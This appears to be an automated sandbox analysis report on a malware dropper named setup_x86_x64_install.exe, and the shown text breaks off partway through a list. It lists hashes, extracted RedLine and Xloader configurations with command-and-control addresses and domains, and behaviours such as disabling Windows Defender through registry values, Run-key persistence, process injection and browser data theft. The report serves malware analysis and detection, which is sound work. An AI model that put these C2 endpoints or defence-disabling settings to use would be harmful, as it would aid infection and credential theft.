Resubmissions
27-10-2021 12:55
211027-p592qaegd7 1027-10-2021 05:03
211027-fpnzwaaff8 1026-10-2021 14:24
211026-rqs6rshff8 10Analysis
-
max time kernel
1399s -
max time network
1810s -
platform
windows11_x64 -
resource
win11 -
submitted
27-10-2021 05:03
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7-en-20211014
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210920
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10-ja-20211014
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-en-20210920
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-de-20211014
General
-
Target
setup_x86_x64_install.exe
-
Size
5.6MB
-
MD5
8dfefd1f56f2ac4f1869d86edbb4aa8f
-
SHA1
3a65b0920890fd7e8ae751ee15f76de281584010
-
SHA256
433e51a49b84a52cd5f740a12ec46a145d3c14a95e529d4ef32fd250e02829ed
-
SHA512
996a84df42b79c8786f4347b875621a476bd6a0e71d4c61fd47a726fb9f6717051d03d8b381233e7966c1a2150628b8b7986727298a6fc803aea504f96fd934c
Malware Config
Extracted
redline
media25
91.121.67.60:23325
Extracted
redline
ChrisNEW
194.104.136.5:46013
Extracted
xloader
2.5
s0iw
http://www.kyiejenner.com/s0iw/
ortopediamodelo.com
orimshirts.store
universecatholicweekly.info
yvettechan.com
sersaudavelsempre.online
face-booking.net
europeanretailgroup.com
umofan.com
roemahbajumuslim.online
joyrosecuisine.net
3dmaker.house
megdb.xyz
stereoshopie.info
gv5rm.com
tdc-trust.com
mcglobal.club
choral.works
onlineconsultantgroup.com
friscopaintandbody.com
midwestii.com
weespiel.com
babyshell.be
gwynora.com
talkthered.com
f-punk.com
frankmatlock.com
clique-solicite.net
clientloyaltysystem.com
worldbyduco.com
kampfsport-erfurt.com
adndpanel.xyz
rocknfamily.net
ambr-creative.com
wwwks8829.com
thuexegiarehcmgoviet.com
brentmurrell.art
wolf-yachts.com
tenpobiz.com
binnamall.com
crestamarti.quest
terry-hitchcock.com
ocreverseteam.com
taxwarehouse2.xyz
megawholesalesystem.com
epstein-advisory.com
enewlaunches.com
iphone13.community
pianostands.com
newspaper.clinic
alamdave.com
costalitaestepona2d.com
arbacan.com
horikoshi-online-tutoring.net
missingthered.com
ecmcenterprises.com
giaohangtietkiemhcm.com
universidademackenzie.com
kveupcsmimli.mobi
ibellex.com
ikigaiofficial.store
jerseyboysnorfolk.com
xiamensaikang.com
lmnsky.com
bra866.com
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
resource yara_rule behavioral4/memory/5352-316-0x0000000000000000-mapping.dmp family_redline behavioral4/memory/5352-317-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral4/memory/4012-347-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral4/memory/4012-345-0x0000000000000000-mapping.dmp family_redline -
Socelars Payload 2 IoCs
resource yara_rule behavioral4/files/0x000100000002b1c8-256.dat family_socelars behavioral4/files/0x000100000002b1c8-287.dat family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 31 IoCs
description pid Process procid_target PID 5848 created 5352 5848 Process not Found 129 PID 6736 created 5132 6736 WerFault.exe 126 PID 3264 created 4428 3264 WerFault.exe 128 PID 5848 created 4556 5848 Process not Found 112 PID 5480 created 2220 5480 WerFault.exe 115 PID 6448 created 3088 6448 WerFault.exe 148 PID 5344 created 4944 5344 WerFault.exe 221 PID 7016 created 2640 7016 WerFault.exe 161 PID 3476 created 5620 3476 WerFault.exe 152 PID 7892 created 3812 7892 WerFault.exe 234 PID 7132 created 828 7132 Process not Found 157 PID 8176 created 1724 8176 WerFault.exe 162 PID 2848 created 2240 2848 WerFault.exe 164 PID 4232 created 7076 4232 WerFault.exe 416 PID 6952 created 6424 6952 WerFault.exe 329 PID 8516 created 7056 8516 WerFault.exe 207 PID 8588 created 5388 8588 8E73.exe 286 PID 2916 created 2160 2916 WerFault.exe 257 PID 8572 created 7688 8572 WerFault.exe 290 PID 6436 created 6252 6436 WerFault.exe 296 PID 8444 created 7680 8444 WerFault.exe 291 PID 4404 created 7580 4404 WerFault.exe 303 PID 3192 created 8588 3192 WerFault.exe 378 PID 19172 created 4728 19172 WerFault.exe 380 PID 5684 created 9048 5684 WerFault.exe 398 PID 10296 created 2356 10296 WerFault.exe 414 PID 10756 created 552 10756 WerFault.exe 420 PID 10812 created 5156 10812 WerFault.exe 421 PID 11404 created 5584 11404 WerFault.exe 438 PID 11712 created 8624 11712 WerFault.exe 452 PID 12556 created 9944 12556 WerFault.exe 468 -
Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs
description pid Process procid_target PID 4508 created 2832 4508 svchost.exe 211 PID 4508 created 2832 4508 svchost.exe 211 PID 4508 created 5588 4508 svchost.exe 252 PID 4508 created 5588 4508 svchost.exe 252 PID 4508 created 6892 4508 svchost.exe 239 PID 4508 created 6892 4508 svchost.exe 239 -
Turns off Windows Defender SpyNet reporting 2 TTPs
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Xloader Payload 1 IoCs
resource yara_rule behavioral4/memory/1436-494-0x0000000000530000-0x0000000000559000-memory.dmp xloader -
resource yara_rule behavioral4/files/0x000100000002b1bc-158.dat aspack_v212_v242 behavioral4/files/0x000100000002b1bc-160.dat aspack_v212_v242 behavioral4/files/0x000100000002b1be-163.dat aspack_v212_v242 behavioral4/files/0x000100000002b1be-162.dat aspack_v212_v242 behavioral4/files/0x000200000002b1bb-159.dat aspack_v212_v242 behavioral4/files/0x000200000002b1bb-166.dat aspack_v212_v242 behavioral4/files/0x000200000002b1bb-167.dat aspack_v212_v242 -
Blocklisted process makes network request 40 IoCs
flow pid Process 1153 12680 MsiExec.exe 1157 12680 MsiExec.exe 1163 12680 MsiExec.exe 1169 12680 MsiExec.exe 1173 12680 MsiExec.exe 1178 12680 MsiExec.exe 1180 12680 MsiExec.exe 1184 12680 MsiExec.exe 1187 12680 MsiExec.exe 1192 12680 MsiExec.exe 1195 12680 MsiExec.exe 1199 12680 MsiExec.exe 1202 12680 MsiExec.exe 1207 12680 MsiExec.exe 1210 12680 MsiExec.exe 1216 12680 MsiExec.exe 1221 12680 MsiExec.exe 1224 12680 MsiExec.exe 1228 12680 MsiExec.exe 1233 12680 MsiExec.exe 1238 12680 MsiExec.exe 1240 12680 MsiExec.exe 1245 12680 MsiExec.exe 1248 12680 MsiExec.exe 1255 12680 MsiExec.exe 1258 12680 MsiExec.exe 1264 12680 MsiExec.exe 1267 12680 MsiExec.exe 1270 12680 MsiExec.exe 1272 12680 MsiExec.exe 1276 12680 MsiExec.exe 1281 12680 MsiExec.exe 1285 12680 MsiExec.exe 1289 12680 MsiExec.exe 1292 12680 MsiExec.exe 1294 12680 MsiExec.exe 1299 12680 MsiExec.exe 1305 12680 MsiExec.exe 1308 12680 MsiExec.exe 1313 12680 MsiExec.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts DYbALA.exe File opened for modification C:\Windows\system32\drivers\etc\hosts DYbALA.exe File opened for modification C:\Windows\system32\drivers\etc\hosts DYbALA.exe -
Executes dropped EXE 64 IoCs
pid Process 2500 setup_installer.exe 1780 setup_install.exe 1564 Tue09c257807a702a4.exe 1500 Tue0985edbf92e08954.exe 5056 Tue0978af55b9.exe 2628 Tue09c6db969ab9.exe 2996 Tue09a30919dc5f00.exe 4556 Tue09786995c7f02a923.exe 3864 Tue09c1731fe55c7.exe 3108 Tue097328c1b990.exe 904 Tue0947ef38552fc.exe 2024 Tue09264824c4.exe 2220 Tue09792fda06e.exe 2288 Tue091e2054cef7.exe 1012 Tue093cbcf0222440.exe 4256 Tue0990c8b597f.exe 4428 Tue0956c36b51.exe 5132 Tue0971aafeebb6f.exe 5220 Tue0990c8b597f.tmp 5532 Tue093cbcf0222440.exe 5268 Tue09c1731fe55c7.exe 5560 Tue0990c8b597f.exe 5352 Tue09c6db969ab9.exe 5688 8wixEKYkU3LAxAJFOjsTzj6U.exe 5732 8wixEKYkU3LAxAJFOjsTzj6U.exe 5756 Tue0990c8b597f.tmp 5572 Tue09c1731fe55c7.exe 5952 identity_helper.exe 5920 Tue09c1731fe55c7.exe 3088 run.exe 1752 run2.exe 5336 51hnPAwNG7NjkLVKY_TSaycw.exe 5620 NNPY5106AAeVqilK_z_F08rO.exe 828 1phdChzdGYsbzdQSL7S8qbXG.exe 5776 PewpsFfSYiXuOGiFJvSIGG6e.exe 2628 DnMDKAawQTsPYfrL4e2YEVdQ.exe 4264 51hnPAwNG7NjkLVKY_TSaycw.exe 5160 WY3JcH0zxuXuKZ0x9hFnf2GO.exe 5612 nvqVMx4So_nVmBVhfMm_C75A.exe 1500 mb2UC8iI_0pul48ZjDuP1Fip.exe 5812 GZXD3irWc3TtUE5pa8tfTilC.exe 3152 NLSKXAzQFqcD5othJip8lEJV.exe 4012 Tue09c1731fe55c7.exe 2908 PewpsFfSYiXuOGiFJvSIGG6e.exe 5752 1hR0WedLFCi2ffiQp2FL4Pi2.exe 2240 9CX5qmuakiAzyoicv8wnw7ta.exe 1352 POhZnp_zz8JHALLWt8sLBpym.exe 1724 _tMp9XngZstVdtUhqc8dTUA1.exe 2640 NNPY5106AAeVqilK_z_F08rO.exe 3792 IMyFCJUgJ9GhCKD0v0c9wv0b.exe 5696 o4mHnIgSYQW7O5XO3gGRoCgQ.exe 1692 msedge.exe 4796 cutm3.exe 5032 Conhost.exe 6204 jg1_1faf.exe 6212 BAJsVPm1_iONxhvXOXHtjEzv.exe 6644 wmOHBUlmJYRTjQx5I_08gsQ9.exe 7080 Conhost.exe 5204 WVl9U240Z3iuGFJtZ_uUW87k.tmp 6392 LzmwAqmV.exe 5684 WerFault.exe 1100 3480205.exe 6496 Altrove.exe.com 5284 msedge.exe -
Sets service image path in registry 2 TTPs
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion PewpsFfSYiXuOGiFJvSIGG6e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion PewpsFfSYiXuOGiFJvSIGG6e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion PewpsFfSYiXuOGiFJvSIGG6e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion PewpsFfSYiXuOGiFJvSIGG6e.exe -
Loads dropped DLL 64 IoCs
pid Process 1780 setup_install.exe 1780 setup_install.exe 1780 setup_install.exe 1780 setup_install.exe 1780 setup_install.exe 1780 setup_install.exe 1780 setup_install.exe 5220 Tue0990c8b597f.tmp 5756 Tue0990c8b597f.tmp 6644 wmOHBUlmJYRTjQx5I_08gsQ9.exe 6644 wmOHBUlmJYRTjQx5I_08gsQ9.exe 6644 wmOHBUlmJYRTjQx5I_08gsQ9.exe 5204 WVl9U240Z3iuGFJtZ_uUW87k.tmp 6644 wmOHBUlmJYRTjQx5I_08gsQ9.exe 3940 setup.tmp 6712 msiexec.exe 2092 setup.tmp 3604 Calculator Installation.exe 3604 Calculator Installation.exe 7032 setup.exe 7032 setup.exe 3604 Calculator Installation.exe 2388 akhMUMUNUEvdQs_g_0zvWAt6.exe 2388 akhMUMUNUEvdQs_g_0zvWAt6.exe 5868 76sNFGK2BvYo5HLK0pdT0ET6.tmp 2244 27XBbIsnRU1jbg5LLXRcCgLl.tmp 7524 iobLg91vZLvEF8kRC30NiwUs.exe 7524 iobLg91vZLvEF8kRC30NiwUs.exe 7820 setup.exe 7820 setup.exe 7524 iobLg91vZLvEF8kRC30NiwUs.exe 7524 iobLg91vZLvEF8kRC30NiwUs.exe 7524 iobLg91vZLvEF8kRC30NiwUs.exe 7524 iobLg91vZLvEF8kRC30NiwUs.exe 7524 iobLg91vZLvEF8kRC30NiwUs.exe 2388 akhMUMUNUEvdQs_g_0zvWAt6.exe 7524 iobLg91vZLvEF8kRC30NiwUs.exe 1532 Setup.exe 1532 Setup.exe 7524 iobLg91vZLvEF8kRC30NiwUs.exe 2388 akhMUMUNUEvdQs_g_0zvWAt6.exe 2388 akhMUMUNUEvdQs_g_0zvWAt6.exe 2388 akhMUMUNUEvdQs_g_0zvWAt6.exe 2388 akhMUMUNUEvdQs_g_0zvWAt6.exe 2388 akhMUMUNUEvdQs_g_0zvWAt6.exe 2388 akhMUMUNUEvdQs_g_0zvWAt6.exe 2212 LzmwAqmV.exe 2212 LzmwAqmV.exe 2212 LzmwAqmV.exe 2212 LzmwAqmV.exe 7020 setup.exe 7020 setup.exe 2212 LzmwAqmV.exe 2212 LzmwAqmV.exe 2212 LzmwAqmV.exe 2212 LzmwAqmV.exe 2212 LzmwAqmV.exe 2212 LzmwAqmV.exe 2212 LzmwAqmV.exe 2212 LzmwAqmV.exe 2212 LzmwAqmV.exe 2212 LzmwAqmV.exe 2212 LzmwAqmV.exe 2212 LzmwAqmV.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths 51hnPAwNG7NjkLVKY_TSaycw.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\Pictures\Adobe Films\51hnPAwNG7NjkLVKY_TSaycw.exe = "0" 51hnPAwNG7NjkLVKY_TSaycw.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection 51hnPAwNG7NjkLVKY_TSaycw.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet 51hnPAwNG7NjkLVKY_TSaycw.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "0" 51hnPAwNG7NjkLVKY_TSaycw.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 51hnPAwNG7NjkLVKY_TSaycw.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions 51hnPAwNG7NjkLVKY_TSaycw.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\Pictures\Adobe Films\IMyFCJUgJ9GhCKD0v0c9wv0b.exe = "0" IMyFCJUgJ9GhCKD0v0c9wv0b.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 51hnPAwNG7NjkLVKY_TSaycw.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SpyNetReporting = "0" 51hnPAwNG7NjkLVKY_TSaycw.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 51hnPAwNG7NjkLVKY_TSaycw.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 19 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --iUSIg" setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --iUSIg" setup.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce GZXD3irWc3TtUE5pa8tfTilC.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeAutoLaunch_5EFC0ECB77A7585FE9DCDD0B2E946A2B = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --no-startup-window /prefetch:5" msedge.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\MSBuild\\Baeshoxylaly.exe\"" DYbALA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --iUSIg" setup.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 3235482.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WTP8L = "C:\\Program Files (x86)\\Ziv1tvr\\2d8wlrxv4k0.exe" cmd.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\MSBuild = "\"C:\\Users\\Admin\\AppData\\Roaming\\MSBuild.exe\"" MSBuild.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Media Player\\SHubahurofae.exe\"" DYbALA.exe Key created \Registry\Machine\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run cmd.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\MSBuild = "\"C:\\Users\\Admin\\AppData\\Roaming\\MSBuild.exe\"" MSBuild.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --iUSIg" setup.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" GZXD3irWc3TtUE5pa8tfTilC.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA PewpsFfSYiXuOGiFJvSIGG6e.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA PewpsFfSYiXuOGiFJvSIGG6e.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jg1_1faf.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\N: installer.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\Y: installer.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\K: installer.exe File opened (read-only) \??\M: installer.exe File opened (read-only) \??\O: installer.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\P: installer.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\S: installer.exe File opened (read-only) \??\V: installer.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\E: installer.exe File opened (read-only) \??\T: installer.exe File opened (read-only) \??\Z: installer.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\R: installer.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\L: installer.exe File opened (read-only) \??\Q: installer.exe File opened (read-only) \??\U: installer.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\G: installer.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\B: installer.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\J: installer.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\T: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 13 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 88 ipinfo.io 172 ipinfo.io 395 ipinfo.io 549 ipinfo.io 557 ipinfo.io 1 ipinfo.io 45 ipinfo.io 46 ipinfo.io 252 ipinfo.io 552 ipinfo.io 1 ip-api.com 178 ipinfo.io 234 ipinfo.io -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 5776 PewpsFfSYiXuOGiFJvSIGG6e.exe 2908 PewpsFfSYiXuOGiFJvSIGG6e.exe -
Suspicious use of SetThreadContext 14 IoCs
description pid Process procid_target PID 2628 set thread context of 5352 2628 DnMDKAawQTsPYfrL4e2YEVdQ.exe 129 PID 3864 set thread context of 4012 3864 Tue09c1731fe55c7.exe 149 PID 5752 set thread context of 3220 5752 1hR0WedLFCi2ffiQp2FL4Pi2.exe 9 PID 3088 set thread context of 6724 3088 run.exe 247 PID 5612 set thread context of 6704 5612 nvqVMx4So_nVmBVhfMm_C75A.exe 261 PID 1436 set thread context of 3220 1436 cmd.exe 9 PID 3792 set thread context of 5136 3792 IMyFCJUgJ9GhCKD0v0c9wv0b.exe 273 PID 4264 set thread context of 6284 4264 51hnPAwNG7NjkLVKY_TSaycw.exe 272 PID 5336 set thread context of 5888 5336 msedge.exe 281 PID 2288 set thread context of 7764 2288 Tue091e2054cef7.exe 306 PID 2240 set thread context of 7276 2240 9CX5qmuakiAzyoicv8wnw7ta.exe 314 PID 3424 set thread context of 5508 3424 177C.exe 387 PID 16052 set thread context of 19020 16052 gchrdfmab.exe 519 PID 19020 set thread context of 12348 19020 MSBuild.exe 529 -
autoit_exe 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral4/files/0x000100000002b1c6-211.dat autoit_exe behavioral4/files/0x000100000002b1c6-246.dat autoit_exe -
Drops file in Program Files directory 28 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat Tue0990c8b597f.tmp File created C:\Program Files (x86)\Windows Media Player\SHubahurofae.exe DYbALA.exe File opened for modification C:\Program Files (x86)\Ziv1tvr Explorer.EXE File created C:\Program Files (x86)\Ziv1tvr\2d8wlrxv4k0.exe Explorer.EXE File created C:\Program Files (x86)\FarLabUninstaller\is-0KBJU.tmp setup.tmp File created C:\Program Files (x86)\MSBuild\Baeshoxylaly.exe DYbALA.exe File created C:\Program Files (x86)\MSBuild\Baeshoxylaly.exe.config DYbALA.exe File created C:\Program Files\Common Files\MWUMGVDMQL\foldershare.exe.config DYbALA.exe File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe o4mHnIgSYQW7O5XO3gGRoCgQ.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe o4mHnIgSYQW7O5XO3gGRoCgQ.exe File opened for modification C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe setup.tmp File created C:\Program Files (x86)\FarLabUninstaller\is-SRG8J.tmp setup.tmp File created C:\Program Files (x86)\FarLabUninstaller\is-K64OO.tmp Tue0990c8b597f.tmp File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe DnMDKAawQTsPYfrL4e2YEVdQ.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe DnMDKAawQTsPYfrL4e2YEVdQ.exe File created C:\Program Files (x86)\FarLabUninstaller\unins000.dat Tue0990c8b597f.tmp File opened for modification C:\Program Files (x86)\Company\NewProduct\cutm3.exe mb2UC8iI_0pul48ZjDuP1Fip.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe mb2UC8iI_0pul48ZjDuP1Fip.exe File created C:\Program Files (x86)\FarLabUninstaller\is-KH4JE.tmp setup.tmp File created C:\Program Files (x86)\FarLabUninstaller\is-P9T9I.tmp setup.tmp File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat setup.tmp File opened for modification C:\Program Files (x86)\Ziv1tvr\2d8wlrxv4k0.exe cmd.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\inst3.exe mb2UC8iI_0pul48ZjDuP1Fip.exe File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini mb2UC8iI_0pul48ZjDuP1Fip.exe File opened for modification C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe setup.tmp File created C:\Program Files (x86)\Windows Media Player\SHubahurofae.exe.config DYbALA.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe mb2UC8iI_0pul48ZjDuP1Fip.exe File created C:\Program Files\Common Files\MWUMGVDMQL\foldershare.exe DYbALA.exe -
Drops file in Windows directory 37 IoCs
description ioc Process File opened for modification C:\Windows\Installer\MSICCFA.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSID1DF.tmp msiexec.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.edb svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm svchost.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe File opened for modification C:\Windows\Installer\f7888aa.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSIF50C.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF569865787FF301E8.TMP msiexec.exe File created C:\Windows\Tasks\MSBuild.job MSBuild.exe File opened for modification C:\Windows\WindowsUpdate.log svchost.exe File opened for modification C:\Windows\WinSxS\pending.xml TiWorker.exe File created C:\Windows\Installer\f7888aa.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIEE24.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIF161.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log svchost.exe File opened for modification C:\Windows\Logs\CBS\CBS.log TiWorker.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSID79.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF3754617C6B7DDC5B.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSIC1CC.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIEBB2.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF67790B59EF749E76.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSI980C.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIC95F.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSICF9C.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF2CE44ABC1AFACD10.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSI101A.tmp msiexec.exe File created C:\Windows\Tasks\AdvancedWindowsManager #1.job MsiExec.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log svchost.exe File opened for modification C:\Windows\Installer\MSICE24.tmp msiexec.exe File opened for modification 